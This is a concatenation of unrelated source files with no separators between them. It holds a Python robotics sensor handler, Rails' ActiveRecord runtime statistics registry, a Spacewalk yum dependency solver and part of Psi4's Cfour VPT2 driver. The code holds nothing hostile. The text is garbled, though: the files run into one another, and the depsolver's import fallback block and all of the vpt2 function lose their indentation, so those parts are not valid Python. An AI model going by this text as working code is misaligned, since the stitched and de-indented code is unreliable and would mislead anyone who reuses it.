                sensorType, ", ".join(self.sensorTypes)))
        if sensorType == 'none':
            # Fix: pop() instead of del so detaching a port that has no
            # sensor attached no longer raises KeyError.
            self.sensors.pop(port, None)
        else:
            self.sensors[port] = self.sensorTypes[sensorType](
                self.brick, self.sensorPorts[port])
            if sensorType == 'light':
                # Light sensors default to passive; turn the LED on.
                self.sensors[port].set_illuminated(True)

    def remove_sensor(self, port):
        """Detach whatever sensor is on `port` (no-op if none attached)."""
        self.add_sensor(port, 'none')
# frozen_string_literal: true
module ActiveRecord
  # This is a thread locals registry for Active Record. For example:
  #
  #   ActiveRecord::RuntimeRegistry.stats.sql_runtime
  #
  # returns the SQL statistics local to the current unit of execution
  # (either thread or fiber).
  module RuntimeRegistry # :nodoc:
    # Per-execution-context accumulator for query timing and counts.
    class Stats
      attr_accessor :sql_runtime, :async_sql_runtime, :queries_count, :cached_queries_count

      def initialize
        @sql_runtime = 0.0          # total SQL time, in milliseconds
        @async_sql_runtime = 0.0    # portion spent in async queries
        @queries_count = 0          # real queries (cache hits included)
        @cached_queries_count = 0   # queries answered from the query cache
      end

      # Zeroes both runtime counters and returns the previous sql_runtime.
      def reset_runtimes
        sql_runtime_was = @sql_runtime
        @sql_runtime = 0.0
        @async_sql_runtime = 0.0
        sql_runtime_was
      end

      # Expose #initialize as a public #reset that clears every counter.
      public alias_method :reset, :initialize
    end

    extend self

    # ActiveSupport::Notifications entry point for "sql.active_record" events.
    def call(name, start, finish, id, payload)
      record(
        payload[:name],
        (finish - start) * 1_000.0, # seconds -> milliseconds
        cached: payload[:cached],
        async: payload[:async],
        lock_wait: payload[:lock_wait],
      )
    end

    # Fold one query's timing into the current context's Stats.
    def record(query_name, runtime, cached: false, async: false, lock_wait: nil)
      stats = self.stats

      # TRANSACTION/SCHEMA statements are bookkeeping, not user queries.
      unless query_name == "TRANSACTION" || query_name == "SCHEMA"
        stats.queries_count += 1
        stats.cached_queries_count += 1 if cached
      end

      if async
        # Async runtime excludes the time spent waiting on the result lock.
        stats.async_sql_runtime += (runtime - lock_wait)
      end
      stats.sql_runtime += runtime
    end

    # Stats for the current thread/fiber, created lazily.
    def stats
      ActiveSupport::IsolatedExecutionState[:active_record_runtime] ||= Stats.new
    end

    def reset
      stats.reset
    end
  end
end
ActiveSupport::Notifications.monotonic_subscribe("sql.active_record", ActiveRecord::RuntimeRegistry)
#!/usr/bin/python
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012--2015 Red Hat, Inc.
#
# Lookup package dependencies in a yum repository
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation
import logging
import re
import shutil
import sys
import yum
from yum.misc import prco_tuple_to_string
from yum.packageSack import ListPackageSack
from yum.packages import parsePackages
from yum.repos import RepoStorage
try:
from spacewalk.satellite_tools.progress_bar import ProgressBar
except ImportError:
# pylint: disable=F0401
_LIBPATH = "/usr/share/rhn"
if _LIBPATH not in sys.path:
sys.path.append(_LIBPATH)
from satellite_tools.progress_bar import ProgressBar
log = logging.getLogger(__name__)
# Scratch location for yum repo metadata; wiped by DepSolver.cleanup().
CACHE_DIR = "/tmp/cache/yum"
# Persistent-state directory handed to each YumRepository.
PERSIST_DIR = "/var/lib/yum"
class DepSolver:
    """Resolve package dependencies against a set of yum repositories.

    Repositories are loaded into a private ``RepoStorage`` sack so that
    whatprovides queries can be answered without touching the system's
    yum configuration.
    """

    def __init__(self, repos, pkgs_in=None):
        # repos: list of dicts with 'id' and 'relative_path' (repodata dir).
        # pkgs_in: optional initial list of package name strings.
        self.pkgs = pkgs_in or []
        self.repos = repos
        self._repostore = RepoStorage(self)
        self.cleanup()  # call cleanup before and after, to ensure no stale metadata
        self.setup()
        self.loadPackages()
        self.yrepo = None

    def setPackages(self, pkgs_in):
        # Replace the package list used by later dependency lookups.
        self.pkgs = pkgs_in

    def setup(self):
        """
        Load the repos into repostore to query package dependencies
        """
        for repo in self.repos:
            self.yrepo = yum.yumRepo.YumRepository(repo['id'])
            # Repos are local directories, accessed through file:// URLs.
            self.yrepo.baseurl = ["file://%s/" % str(repo['relative_path'])]
            self.yrepo.basecachedir = CACHE_DIR
            self.yrepo.base_persistdir = PERSIST_DIR
            self._repostore.add(self.yrepo)

    def loadPackages(self):
        """
        populate the repostore with packages
        """
        # pylint: disable=W0212
        self._repostore._setup = True
        self._repostore.populateSack(which='all')

    def cleanup(self):
        """
        clean up the repo metadata cache from /tmp/cache/yum
        """
        for repo in self._repostore.repos:
            cachedir = "%s/%s" % (CACHE_DIR, repo)
            try:
                shutil.rmtree(cachedir)
            except IOError:
                # Best-effort: the cache directory may not exist yet.
                pass

    def getDependencylist(self):
        """
        Get dependency list and suggested packages for package names provided.
        The dependency lookup is only one level in this case.
        The package name format could be any of the following:
        name, name.arch, name-ver-rel.arch, name-ver, name-ver-rel,
        epoch:name-ver-rel.arch, name-epoch:ver-rel.arch
        """
        ematch, match, _unmatch = parsePackages(self._repostore.pkgSack, self.pkgs)
        pkgs = []
        # Exact and glob matches are treated alike for dependency lookup.
        for po in ematch + match:
            pkgs.append(po)
        results = self.__locateDeps(pkgs)
        return results

    def getRecursiveDepList(self):
        """
        Get dependency list and suggested packages for package names provided.
        The dependency lookup is recursive. All available packages in the repo
        are returned matching whatprovides.
        The package name format could be any of the following:
        name, name.arch, name-ver-rel.arch, name-ver, name-ver-rel,
        epoch:name-ver-rel.arch, name-epoch:ver-rel.arch
        returns a dictionary of {'n-v-r.a' : [n,v,e,r,a],...}
        """
        solved = []
        to_solve = self.pkgs
        all_results = {}
        # Breadth-first expansion: solve one level, queue the providers
        # that have not been solved yet, repeat until closure.
        while to_solve:
            log.debug("Solving %s \n\n", to_solve)
            results = self.getDependencylist()
            all_results.update(results)
            found = self.processResults(results)[0]
            solved += to_solve
            to_solve = []
            for _dep, pkgs in found.items():
                for pkg in pkgs:
                    name, version, _epoch, release, arch = pkg
                    ndep = "%s-%s-%s.%s" % (name, version, release, arch)
                    solved = list(set(solved))
                    if ndep not in solved:
                        to_solve.append(ndep)
            self.pkgs = to_solve
        return all_results

    def __locateDeps(self, pkgs):
        # Map each package to {requirement-tuple: [satisfying packages]}.
        results = {}
        regex_filename_match = re.compile(r'[/*?]|\[[^]]*/[^]]*\]').match
        print("Solving Dependencies (%i): " % len(pkgs))
        pb = ProgressBar(prompt='', endTag=' - complete',
                         finalSize=len(pkgs), finalBarLength=40, stream=sys.stdout)
        pb.printAll(1)
        for pkg in pkgs:
            pb.addTo(1)
            pb.printIncrement()
            results[pkg] = {}
            reqs = pkg.requires
            reqs.sort()
            pkgresults = results[pkg]
            for req in reqs:
                (r, f, v) = req
                if r.startswith('rpmlib('):
                    # rpmlib() capabilities are provided by rpm itself.
                    continue
                satisfiers = []
                for po in self.__whatProvides(r, f, v):
                    # verify this po indeed provides the dep,
                    # el5 version could give some false positives
                    if regex_filename_match(r) or \
                            po.checkPrco('provides', (r, f, v)):
                        satisfiers.append(po)
                pkgresults[req] = satisfiers
        pb.printComplete()
        return results

    def __whatProvides(self, name, flags, version):
        # pylint: disable=W0702
        try:
            return ListPackageSack(self._repostore.pkgSack.searchProvides((name, flags, version)))
        except:
            # perhaps we're on older version of yum try old style
            return ListPackageSack(self._repostore.pkgSack.searchProvides(name))

    @staticmethod
    def processResults(results):
        """Split __locateDeps() output into satisfied and unsatisfied deps.

        Returns (found, notfound): found maps a printable requirement to a
        list of [name, version, epoch, release, arch] providers; notfound
        maps unsatisfied requirements to empty lists.
        """
        reqlist = {}
        notfound = {}
        for pkg in results:
            if len(results[pkg]) == 0:
                continue
            for req in results[pkg]:
                rlist = results[pkg][req]
                if not rlist:
                    # Unsatisfied dependency
                    notfound[prco_tuple_to_string(req)] = []
                    continue
                reqlist[prco_tuple_to_string(req)] = rlist
        found = {}
        for req, rlist in reqlist.items():
            found[req] = []
            for r in rlist:
                dep = [r.name, r.version, r.epoch, r.release, r.arch]
                if dep not in found[req]:
                    found[req].append(dep)
        return found, notfound

    @staticmethod
    def printable_result(results):
        """Format __locateDeps() output as a human-readable report string."""
        print_doc_str = ""
        for pkg in results:
            if len(results[pkg]) == 0:
                continue
            for req in results[pkg]:
                rlist = results[pkg][req]
                print_doc_str += "\n dependency: %s \n" % prco_tuple_to_string(req)
                if not rlist:
                    # Unsatisfied dependency
                    print_doc_str += " Unsatisfied dependency \n"
                    continue
                for po in rlist:
                    print_doc_str += " provider: %s\n" % po.compactPrint()
        return print_doc_str
if __name__ == '__main__':
    # CLI entry point: depsolver.py <repoid> <repodata_path> <pkg> [<pkg> ...]
    if len(sys.argv) < 3:
        print "USAGE: python depsolver.py <repoid> <repodata_path> <pkgname1> <pkgname2> ....<pkgnameN>"
        sys.exit(0)
    arg_repo = {'id': sys.argv[1],
                'relative_path': sys.argv[2], }  # path to where repodata is located
    arg_pkgs = sys.argv[3:]
    dsolve = DepSolver([arg_repo], arg_pkgs)
    deplist = dsolve.getDependencylist()
    result_set = dsolve.processResults(deplist)
    print result_set
    print "Printable dependency Results: \n\n %s" % dsolve.printable_result(deplist)
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2019 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""Module with functions for Psi4/Cfour interface. Portions that require
calls to Boost Python psi4 module are here, otherwise in qcdb module.
Also calls to qcdb module are here and not elsewhere in driver.
Organizationally, this module isolates qcdb code from psi4 code.
"""
import datetime
import difflib
import glob
import os
import re
import shelve
import shutil
import subprocess
import sys
from psi4.driver.p4util.exceptions import *
def run_cfour_module(xmod):
    """Run the Cfour module executable *xmod* and return its captured stdout.

    The child environment merges PSIPATH into PATH and appends the Psi4
    basis-set directories.

    Raises ValidationError if the executable cannot be launched.
    """
    # Find environment by merging PSIPATH and PATH environment variables
    lenv = {
        'PATH': ':'.join([os.path.abspath(x) for x in os.environ.get('PSIPATH', '').split(':') if x != '']) + \
                ':' + os.environ.get('PATH') + \
                ':' + core.get_datadir() + '/basis' + \
                ':' + core.psi_top_srcdir() + '/share/basis',
        'CFOUR_NUM_CORES': os.environ.get('CFOUR_NUM_CORES'),
        'LD_LIBRARY_PATH': os.environ.get('LD_LIBRARY_PATH')
    }
    # Filter out None values as subprocess will fault on them
    lenv = {k: v for k, v in lenv.items() if v is not None}

    # Launch the Cfour module, capturing stdout. Text mode so readline()
    # yields str under Python 3 (the accumulator below is a str).
    try:
        retcode = subprocess.Popen([xmod], bufsize=0, stdout=subprocess.PIPE,
                                   universal_newlines=True, env=lenv)
    except OSError as e:
        # Fix: the original referenced an undefined name `cfour_executable`
        # here, turning every launch failure into a NameError. Report the
        # module that actually failed to start.
        message = 'Program %s not found in path or execution failed: %s\n' % (xmod, e.strerror)
        sys.stderr.write(message)
        raise ValidationError(message)

    # Drain the pipe line-by-line until the child closes stdout.
    c4out = ''
    while True:
        data = retcode.stdout.readline()
        if not data:
            break
        c4out += data
    return c4out
def vpt2(name, **kwargs):
"""Perform vibrational second-order perturbation computation through
Cfour to get anharmonic frequencies. This version uses c4 for the disp
and pt2 but gets gradients from p4.
:type c4full: :ref:`boolean <op_py_boolean>`
:param c4full: ``'on'`` || |dl| ``'off'`` |dr|
Indicates whether when *name* indicates a Cfour method and *mode*
indicates a sow/reap approach, sown files are direct ZMAT files
and FJOBARC files are expected to reap, so that Cfour only, not
Cfour-through-Psi4, is needed for distributed jobs.
.. caution:: Some features are not yet implemented. Buy a developer a coffee.
- Presently uses all gradients. Could mix in analytic 2nd-derivs.
- Collect resutls.
- Manage scratch / subdir better.
- Allow CFOUR_BASIS
- Consider forcing some tighter convcrit, c4 and p4
- mixed ang/bohr signals
- error by converting to ang in psi?
- Expand CURRENT DIPOLE XYZ beyond SCF
- Remember additional FJOBARC record TOTENER2 if EXCITE .ne. NONE
- switch C --> S/R with recovery using shelf
"""
lowername = name.lower()
kwargs = p4util.kwargs_lower(kwargs)
optstash = p4util.OptionsState(
['BASIS'])
# Option mode of operation- whether vpt2 run in one job or files farmed out
if not('vpt2_mode' in kwargs):
if ('mode' in kwargs):
kwargs['vpt2_mode'] = kwargs['mode']
del kwargs['mode']
else:
kwargs['vpt2_mode'] = 'continuous'
# Switches for route through code- S/R or continuous & Psi4 or Cfour gradients
isSowReap = True if kwargs['vpt2_mode'].lower() == 'sowreap' else False
isC4notP4 = bool(re.match('cfour', lowername)) or bool(re.match('c4-', lowername))
isC4fully = True if ('c4full' in kwargs and yes.match(str(kwargs['c4full'])) and isC4notP4 and isSowReap) else False
# Save submission directory and basis set
current_directory = os.getcwd()
user_basis = core.get_global_option('BASIS')
# Open data persistence shelf- vital for sowreap, checkpoint for continuouw
shelf = shelve.open(current_directory + '/' + os.path.splitext(core.outfile_name())[0] + '.shelf', writeback=True)
# Cfour keywords to request vpt2 analysis through findif gradients
core.set_local_option('CFOUR', 'CFOUR_VIBRATION', 'FINDIF')
core.set_local_option('CFOUR', 'CFOUR_FREQ_ALGORITHM', 'PARALLEL')
core.set_local_option('CFOUR', 'CFOUR_ANH_ALGORITHM', 'PARALLEL')
core.set_local_option('CFOUR', 'CFOUR_ANHARMONIC', 'VPT2')
core.set_local_option('CFOUR', 'CFOUR_FD_PROJECT', 'OFF')
# When a Psi4 method is requested for vpt2, a skeleton of
# computations in Cfour is still required to hang the gradients
# upon. The skeleton is as cheap as possible (integrals only
# & sto-3g) and set up here.
if isC4notP4:
skelname = lowername
else:
skelname = 'c4-scf'
core.set_global_option('BASIS', 'STO-3G')
# P4 'c4-scf'/'cfour'CALC_LEVEL lowername # temporary
# C4 lowername cfour{} # temporary
if 'status' not in shelf:
shelf['status'] = 'initialized'
shelf['linkage'] = os.getpid()
shelf['zmat'] = {} # Cfour-generated ZMAT files with finite difference geometries
shelf['fjobarc'] = {} # Cfour- or Psi4-generated ascii files with packaged gradient results
shelf.sync()
else:
pass
# how decide whether to use. keep precedent of intco.dat in mind
# Construct and move into directory job scratch / cfour scratch / harm
psioh = core.IOManager.shared_object()
psio = core.IO.shared_object()
os.chdir(psioh.get_default_path()) # psi_scratch
cfour_tmpdir = kwargs['path'] if 'path' in kwargs else \
'psi.' + str(os.getpid()) + '.' + psio.get_default_namespace() + \
'.cfour.' + str(uuid.uuid4())[:8]
if not os.path.exists(cfour_tmpdir):
os.mkdir(cfour_tmpdir)
os.chdir(cfour_tmpdir) # psi_scratch/cfour
if not os.path.exists('harm'):
os.mkdir('harm')
os.chdir('harm') # psi_scratch/cfour/harm
psioh.set_specific_retention(32, True) # temporary, to track p4 scratch
#shelf['status'] = 'anharm_jobs_sown' # temporary to force backtrack
print('STAT', shelf['status']) # temporary
# Generate the ZMAT input file in scratch
with open('ZMAT', 'w') as handle:
cfour_infile = write_zmat(skelname, 1)
handle.write(cfour_infile)
print('\n====== Begin ZMAT input for CFOUR ======')
print(open('ZMAT', 'r').read())
print('======= End ZMAT input for CFOUR =======\n')
shelf['genbas'] = open('GENBAS', 'r').read()
# Check existing shelf consistent with generated ZMAT, store
if ('000-000' in shelf['zmat']) and (shelf['zmat']['000-000'] != cfour_infile):
diff = difflib.Differ().compare(shelf['zmat']['000-000'].splitlines(), cfour_infile.splitlines())
raise ValidationError("""Input file translated to Cfour ZMAT does not match ZMAT stored in shelf.\n\n""" +
'\n'.join(list(diff)))
shelf['zmat']['000-000'] = cfour_infile
shelf.sync()
# Reset basis after Cfour skeleton seeded
core.set_global_option('BASIS', user_basis)
if shelf['status'] == 'initialized':
p4util.banner(' VPT2 Setup: Harmonic ')
# Generate the displacements that will form the harmonic freq
os.chdir(psioh.get_default_path() + cfour_tmpdir + '/harm') # psi_scratch/cfour/harm
with open('partial.out', 'w') as handle:
handle.write(run_cfour_module('xjoda'))
handle.write(run_cfour_module('xsymcor'))
# Read the displacements that will form the harmonic freq
zmats0N = ['000-' + item[-3:] for item in sorted(glob.glob('zmat*'))]
for zm12 in zmats0N:
zm1, zm2 = zm12.split('-')
with open('zmat' + zm2, 'r') as handle:
shelf['zmat'][zm12] = handle.read()
shelf.sync()
core.print_out(' CFOUR scratch file %s for %s-%s has been read\n' % ('zmat' + zm2, zm1, zm2))
core.print_out('%s\n' % shelf['zmat'][zm12])
# S/R: Write distributed input files for harmonic freq
if isSowReap:
os.chdir(current_directory)
inputSansMol = p4util.format_currentstate_for_input(gradient, lowername, allButMol=True, **kwargs)
for zm12 in zmats0N:
zm1, zm2 = zm12.split('-')
ifile = vpt2_sow_files(zm12, shelf['linkage'], isC4notP4, isC4fully,
shelf['zmat'][zm12], inputSansMol, shelf['genbas'])
with open('VPT2-' + zm12 + '.in', 'w') as handle:
handle.write(ifile)
msg = vpt2_instructions('harmonic', current_directory, zmats0N)
core.print_out(msg)
print(msg)
shelf['status'] = 'harm_jobs_sown'
# S/R: Pause for distributed calculations
if isSowReap:
shelf.close()
return 0.0
if shelf['status'] == 'harm_jobs_sown':
zmats0N = [item for item in sorted(shelf['zmat'].keys()) if (item[:3] == '000' and item[-3:] != '000')]
# S/R: Check that distributed calcs all completed correctly
if isSowReap:
msg = vpt2_instructions('harmonic', current_directory, zmats0N)
core.print_out(msg)
isOk, msg = sown_jobs_status(current_directory, 'VPT2', zmats0N, reap_job_validate,
shelf['linkage'], ['CURRENT ENERGY', 'CURRENT DIPOLE', 'CURRENT GRADIENT'])
core.print_out(msg)
print(msg)
if not isOk:
shelf.close()
return 0.0
# Collect all results from gradients forming the harmonic freq
for zm12 in zmats0N:
zm1, zm2 = zm12.split('-')
if zm12 not in shelf['fjobarc']:
p4util.banner(' VPT2 Computation: %s ' % (zm12))
print(' VPT2 Computation: %s ' % (zm12))
fjobarc = vpt2_reaprun_files(zm12, shelf['linkage'], isSowReap, isC4notP4, isC4fully,
shelf['zmat'][zm12], current_directory, psioh.get_default_path(), cfour_tmpdir,
lowername, kwargs)
shelf['fjobarc'][zm12] = fjobarc
shelf.sync()
shelf['status'] = 'harm_jobs_reaped'
if shelf['status'] == 'harm_jobs_reaped':
zmats0N = [item for item in sorted(shelf['zmat'].keys()) if (item[:3] == '000' and item[-3:] != '000')]
p4util.banner(' VPT2 Results: Harmonic ')
# Process the gradients into harmonic freq
os.chdir(psioh.get_default_path() + cfour_tmpdir + '/harm') # psi_scratch/cfour/harm
harmout = run_cfour_module('xjoda')
harmout += run_cfour_module('xsymcor')
for zm12 in zmats0N:
zm1, zm2 = zm12.split('-')
with open('FJOBARC', 'w') as handle:
handle.write(shelf['fjobarc'][zm12])
harmout += run_cfour_module('xja2fja')
harmout += run_cfour_module('xsymcor')
shutil.move('FJOBARC', 'fja.' + zm12)
try:
os.remove('zmat' + zm2)
except OSError:
pass
harmout += run_cfour_module('xjoda')
harmout += run_cfour_module('xcubic')
core.print_out(harmout)
with open('harm.out', 'w') as handle:
handle.write(harmout)
# Generate displacements along harmonic normal modes
zmatsN0 = [item[-3:] for item in sorted(glob.glob('zmat*'))]
os.chdir('..') # psi_scratch/cfour
for zm1 in zmatsN0:
zm12 = zm1 + '-000'
with open(psioh.get_default_path() + cfour_tmpdir + '/harm/zmat' + zm1, 'r') as handle:
shelf['zmat'][zm12] = handle.read()
shelf.sync()
core.print_out(' CFOUR scratch file %s for %s has been read\n' % ('zmat' + zm1, zm12))
core.print_out('%s\n' % shelf['zmat'][zm12])
# Collect displacements along the normal coordinates generated by the harmonic freq.
# Further harmonic freqs are to be run at each of these to produce quartic force field.
# To carry these out, generate displacements for findif by gradient at each displacement.
if os.path.exists(zm1):
shutil.rmtree(zm1)
os.mkdir(zm1)
os.chdir(zm1) # psi_scratch/cfour/004
with open('ZMAT', 'w') as handle:
handle.write(shelf['zmat'][zm12])
shutil.copy2('../harm/GENBAS', 'GENBAS') # ln -s $ecpdir/ECPDATA $j/ECPDATA
with open('partial.out', 'w') as handle:
handle.write(run_cfour_module('xjoda'))
handle.write(run_cfour_module('xsymcor'))
# Read the displacements that will form the anharmonic freq
zmatsNN = [item[-3:] for item in sorted(glob.glob('zmat*'))]
for zm2 in zmatsNN:
zm12 = zm1 + '-' + zm2
with open(psioh.get_default_path() + cfour_tmpdir + '/' + zm1 + '/zmat' + zm2, 'r') as handle:
shelf['zmat'][zm12] = handle.read()
shelf.sync()
core.print_out(' CFOUR scratch file %s for %s has been read\n' % ('zmat' + zm2, zm12))
core.print_out('%s\n' % shelf['zmat'][zm12])
os.chdir('..') # psi_scratch/cfour
zmatsNN = [item for item in sorted(shelf['zmat'].keys()) if (item[:3] != '000' and item[-3:] != '000')]
# S/R: Write distributed input files for anharmonic freq
if isSowReap:
os.chdir(current_directory)
inputSansMol = p4util.format_currentstate_for_input(gradient, lowername, allButMol=True, **kwargs)
for zm12 in zmatsNN:
zm1, zm2 = zm12.split('-')
ifile = vpt2_sow_files(zm12, shelf['linkage'], isC4notP4, isC4fully,
shelf['zmat'][zm12], inputSansMol, shelf['genbas'])
# GENBAS needed here
with open('VPT2-' + zm12 + '.in', 'w') as handle:
handle.write(ifile)
msg = vpt2_instructions('anharmonic', current_directory, zmatsNN)
core.print_out(msg)
print(msg)
shelf['status'] = 'anharm_jobs_sown'
# S/R: Pause for distributed calculations
if isSowReap:
shelf.close()
return 0.0
if shelf['status'] == 'anharm_jobs_sown':
zmatsNN = [item for item in sorted(shelf['zmat'].keys()) if (item[:3] != '000' and item[-3:] != '000')]
# S/R: Check that distributed calcs all completed correctly
if isSowReap:
msg = vpt2_instructions('anharmonic', current_directory, zmatsNN)
core.print_out(msg)
isOk, msg = sown_jobs_status(current_directory, 'VPT2', zmatsNN,
reap_job_validate, shelf['linkage'],
['CURRENT ENERGY', 'CURRENT DIPOLE', 'CURRENT GRADIENT'])
core.print_out(msg)
print(msg)
if not isOk:
shelf.close()
return 0.0
# Collect all results from gradients forming the anharmonic freq
for zm12 in zmatsNN:
zm1, zm2 = zm12.split('-')
if zm12 not in shelf['fjobarc']:
p4util.banner(' VPT2 Computation: %s ' % (zm12))
print(' VPT2 Computation: %s ' % (zm12))
fjobarc = vpt2_reaprun_files(zm12, shelf['linkage'], isSowReap, isC4notP4, isC4fully,
shelf['zmat'][zm12], current_directory, psioh.get_default_path(), cfour_tmpdir,
lowername, kwargs)
shelf['fjobarc'][zm12] = fjobarc
shelf.sync()
shelf['status'] = 'anharm_jobs_reaped'
if shelf['status'] == 'anharm_jobs_reaped':
zmats0N = [item for item in sorted(shelf['zmat'].keys()) if (item[:3] == '000' and item[-3:] != '000')]
zmatsN0 = [item for item in sorted(shelf['zmat'].keys()) if (item[:3] != '000' and item[-3:] == '000')]
zmatsNN = [item for item in sorted(shelf['zmat'].keys()) if (item[:3] != '000' and item[-3:] != '000')]
p4util.banner(' VPT2 Results: Harmonic ')
# Process the gradients into harmonic freq
os.chdir(psioh.get_default_path() + cfour_tmpdir) # psi_scratch/cfour
if os.path.exists('anharm'):
shutil.rmtree('anharm')
os.mkdir('anharm')
os.chdir('harm') # psi_scratch/cfour/harm
run_cfour_module('xclean')
anharmout = run_cfour_module('xjoda')
anharmout += run_cfour_module('xsymcor')
for zm12 in zmats0N:
zm1, zm2 = zm12.split('-')
with open('FJOBARC', 'w') as handle:
handle.write(shelf['fjobarc'][zm12])
anharmout += run_cfour_module('xja2fja')
anharmout += run_cfour_module('xsymcor')
shutil.move('FJOBARC', 'fja.' + zm12)
anharmout += run_cfour_module('xjoda')
anharmout += run_cfour_module('xcubic')
core.print_out(anharmout)
with open('harm.out', 'w') as handle:
handle.write(anharmout)
# Process the gradients into harmonic freq at each normco displaced point
os.chdir('..') # psi_scratch/cfour
for zm11 in zmatsN0:
zm1 = zm11[:3]
if os.path.exists(zm1):
shutil.rmtree(zm1)
os.mkdir(zm1)
os.chdir(zm1) # psi_scratch/cfour/004
run_cfour_module('xclean')
with open('ZMAT', 'w') as handle:
handle.write(shelf['zmat'][zm11])
shutil.copy2('../harm/GENBAS', 'GENBAS')
anharmout = run_cfour_module('xjoda')
anharmout += run_cfour_module('xsymcor')
for zm22 in [item for item in zmatsNN if (item[:3] == zm1 and item[-3:] != '000')]:
zm2 = zm22[-3:]
zm12 = zm1 + '-' + zm2
print(zm12)
with open('FJOBARC', 'w') as handle:
handle.write(shelf['fjobarc'][zm12])
anharmout += run_cfour_module('xja2fja')
anharmout += run_cfour_module('xsymcor')
shutil.move('FJOBARC', 'fja.' + zm12)
anharmout += run_cfour_module('xjoda')
anharmout += run_cfour_module('xja2fja')
with open('FJOBARC', 'r') as handle:
shelf['fjobarc'][zm11] = handle.read()
shelf.sync()
core.print_out(anharmout)
with open('partial.out', 'w') as handle:
handle.write(anharmout)
os.chdir('..') # psi_scratch/cfour
# Process the harmonic freqs at normco displacements into anharmonic freq
p4util.banner(' VPT2 Results: Anharmonic ')
os.chdir('anharm') # psi_scratch/cfour/anharm
shutil.copy2('../harm/JOBARC', 'JOBARC')
shutil.copy2('../harm/JAINDX', 'JAINDX')
for zm12 in zmatsN0:
with open('FJOBARC', 'w') as handle:
handle.write(shelf['fjobarc'][zm12])
anharmout = run_cfour_module('xja2fja')
anharmout += run_cfour_module('xcubic')
shutil.move('FJOBARC', 'fja.' + zm12)
core.print_out(anharmout)
with open('anharm.out', 'w') as handle:
handle.write(anharmout)
shelf['status'] = 'vpt2_completed'
# Finish up
os.chdir(current_directory)
shelf.close()
optstash.restore()
def vpt2_sow_files(item, linkage, isC4notP4, isC4fully, zmat, inputSansMol, inputGenbas):
    """Provided with the particular displacement number *item* and the
    associated *zmat* file contents and *linkage*, and common contents
    *inputSansMol*, returns contents of input file to be sown.
    """
    # Epilogue appended to sown inputs: prints 'VPT2 RESULT:' lines tagged
    # with *linkage* and *item* that reap_job_validate() scans for later.
    # The %r placeholders are left literal for the sown job to fill at runtime.
    inputReapOrders = r"""
print_variables()
print_out('VPT2 RESULT: linkage {0} for item {1} yields CURRENT ENERGY being %r\n' % (variable('CURRENT ENERGY')))
print_out('VPT2 RESULT: linkage {0} for item {1} yields CURRENT GRADIENT being %r\n' % (p4util.mat2arr(core.get_gradient())))
print_out('VPT2 RESULT: linkage {0} for item {1} yields CURRENT DIPOLE being [%r, %r, %r]\n' % (variable('CURRENT DIPOLE X'), variable('CURRENT DIPOLE Y'), variable('CURRENT DIPOLE Z')))
""".format(linkage, item)
    # Direct Cfour for gradients
    if isC4fully:
        # Sown input is the raw ZMAT itself; the basis set file travels
        # alongside as VPT2-GENBAS (written as a side effect here).
        inputString = zmat
        with open('VPT2-GENBAS', 'w') as handle:
            handle.write(inputGenbas)
    # Cfour for gradients
    elif isC4notP4:
        # GENBAS needed here
        # Blank lines in GENBAS are significant; protect them with a
        # 'blankline' sentinel before embedding in the python input string.
        inputString = 'extracted_genbas = """\n' + inputGenbas.replace('\n\n', '\nblankline\n') + '\n"""\n\n'
        inputString += """cfour {\n%s\n}\n\nenergy('cfour', genbas=extracted_genbas)\n\n""" % (zmat)
        inputString += inputReapOrders
        # Cfour reorients the molecule, so the sown job must also report the
        # geometry it actually used back through a RESULT line.
        inputString += r"""
print_out('VPT2 RESULT: linkage {0} for item {1} yields CURRENT MOLECULE being %r\n' % (get_active_molecule().create_psi4_string_from_molecule()))
""".format(linkage, item)
    # Psi4 for gradients
    else:
        inputString = p4util.format_molecule_for_input(
            qcdb.cfour.harvest_zmat(zmat).create_psi4_string_from_molecule(),
            name='disp' + item[:3] + item[-3:])
        inputString += inputSansMol
        inputString += inputReapOrders
    return inputString
def vpt2_reaprun_files(item, linkage, isSowReap, isC4notP4, isC4fully, zmat, outdir, scrdir, c4scrdir, lowername, kwargs):
    """Provided with the particular displacement number *item* and the
    associated *zmat* file with geometry and *linkage*, returns the
    FJOBARC contents. Depending on the mode settings of *isC4notP4*,
    *isSowReap*, and *isC4fully*, either runs (using *lowername* and
    *kwargs*) or reaps contents. *outdir* is where psi4 was invoked,
    *scrdir* is the psi4 scratch directory, and *c4scrdir* is Cfour
    scratch directory within.
    """
    os.chdir(outdir)  # current_directory
    # Extract qcdb.Molecule at findif orientation
    zmmol = qcdb.cfour.harvest_zmat(zmat)
    # Cfour S/R Direct for gradients
    if isC4fully:
        # Cfour produced the packaged result itself; just read it back.
        with open('VPT2-' + item + '.fja', 'r') as handle:
            fjobarc = handle.read()
    # Cfour for gradients
    elif isC4notP4:
        # S/R: Reap results from output file
        if isSowReap:
            isOk, msg, results = reap_job_validate(outdir, 'VPT2', item, linkage,
                ['CURRENT ENERGY', 'CURRENT DIPOLE', 'CURRENT GRADIENT', 'CURRENT MOLECULE'])
            if not isOk:
                raise ValidationError(msg)
            fje = results['CURRENT ENERGY']
            fjgrd = results['CURRENT GRADIENT']
            # Dipole conversion Debye -> a.u. for the FJOBARC file.
            # NOTE(review): this comprehension reuses the name *item*; under
            # Python 2 scoping it clobbers the argument — harmless only
            # because *item* is not read again in this branch. Confirm.
            fjdip = [item / constants.dipmom_au2debye for item in results['CURRENT DIPOLE']]
